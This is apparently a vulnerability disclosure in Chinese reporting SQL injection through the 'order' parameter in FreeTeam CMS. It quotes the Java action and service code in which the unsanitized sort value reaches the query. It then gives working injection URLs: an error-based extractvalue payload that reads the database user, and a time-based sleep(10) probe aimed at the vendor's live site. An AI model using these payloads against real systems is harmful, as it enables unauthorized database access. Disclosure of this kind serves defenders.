公司最近javaee有业务只有提起手枪公关了，深得园长天天炫斗真传。

order注射不只这一处，用到order的基本都存在比如CommentAction里也是类似的注入点,这里就只写一处啦。

免费版跟商业版都存在，只是商业版没有_list后缀，官方关闭了调试盲注。

0x00
 

package cn.freeteam.cms.action.member;

import java.util.List;

import cn.freeteam.base.BaseAction;
import cn.freeteam.cms.model.Comment;
import cn.freeteam.cms.model.Creditlog;
import cn.freeteam.cms.model.Creditrule;
import cn.freeteam.cms.service.CreditlogService;
import cn.freeteam.cms.service.CreditruleService;
import cn.freeteam.model.OperlogsExample;
import cn.freeteam.model.OperlogsExample.Criteria;
import cn.freeteam.util.Pager;

/**
 * 
 * <p>Title: CreditlogAction.java</p>
 * 
 * <p>Description:积分记录相关操作 </p>
 * 
 * <p>Date: Feb 4, 2013</p>
 * 
 * <p>Time: 7:52:23 PM</p>
 * 
 * <p>Copyright: 2013</p>
 * 
 * <p>Company: freeteam</p>
 * 
 * @author freeteam
 * @version 1.0
 * 
 * <p>============================================</p>
 * <p>Modification History
 * <p>Mender: </p>
 * <p>Date: </p>
 * <p>Reason: </p>
 * <p>============================================</p>
 */
public class CreditlogAction extends BaseAction{

private Creditlog creditlog;
private CreditlogService creditlogService;
private CreditruleService creditruleService;
private List<Creditlog> creditlogList;
private List<Creditrule> creditruleList;
private String order="credittime desc";

public CreditlogAction() {
init("creditlogService","creditruleService");
}

/**
 * 列表
 * @return
 */
public String list(){
if (creditlog==null ){
creditlog=new Creditlog();
}
if (order.trim().length()==0) {//只是单单的判断了order不为空，并没有做任何处理。
order=" credittime desc ";
}
creditlog.setMemberid(getLoginMember().getId());
creditruleList=creditruleService.find(null, "ordernum", true);//跟进0x01
creditlogList=creditlogService.find(creditlog, order, currPage, pageSize);
totalCount=creditlogService.count(creditlog);
Pager pager=new Pager(getHttpRequest());
pager.appendParam("creditlog.creditruleid");
pager.appendParam("creditlog.type");
pager.appendParam("pageSize");
pager.appendParam("pageFuncId");
pager.setCurrPage(currPage);
pager.appendParam("order");
pager.setPageSize(pageSize);
pager.setTotalCount(totalCount);
pager.setOutStrNoTable("creditlog_list.do");
pageStr=pager.getOutStrNoTable();
return "list";
}
...

0x01
 

public List<Creditlog> find(Creditlog Creditlog,String order,int currPage,int pageSize){
CreditlogExample example=new CreditlogExample();
Criteria criteria=example.createCriteria();
proSearchParam(Creditlog, criteria);
if (order!=null && order.trim().length()>0) {
example.setOrderByClause(order);//这里引入
}
example.setCurrPage(currPage);
example.setPageSize(pageSize);
return creditlogMapper.selectPageByExample(example);//这里带入查询
}

先注册一个用户

http://localhost:8080/JAVAEE/register.jsp

然后访问

http://localhost:8080/JAVAEE/member/creditlog_list.do?order=extractvalue(1,concat(0x7C,(select user()),0x7C))

官方关闭了调试，用sleep测试了下却是存在，只是映射的名称少了_list

http://www.freeteam.cn/member/creditlog.do?order=sleep(10)

修复方案：

你们是专业的，我是来打酱油的。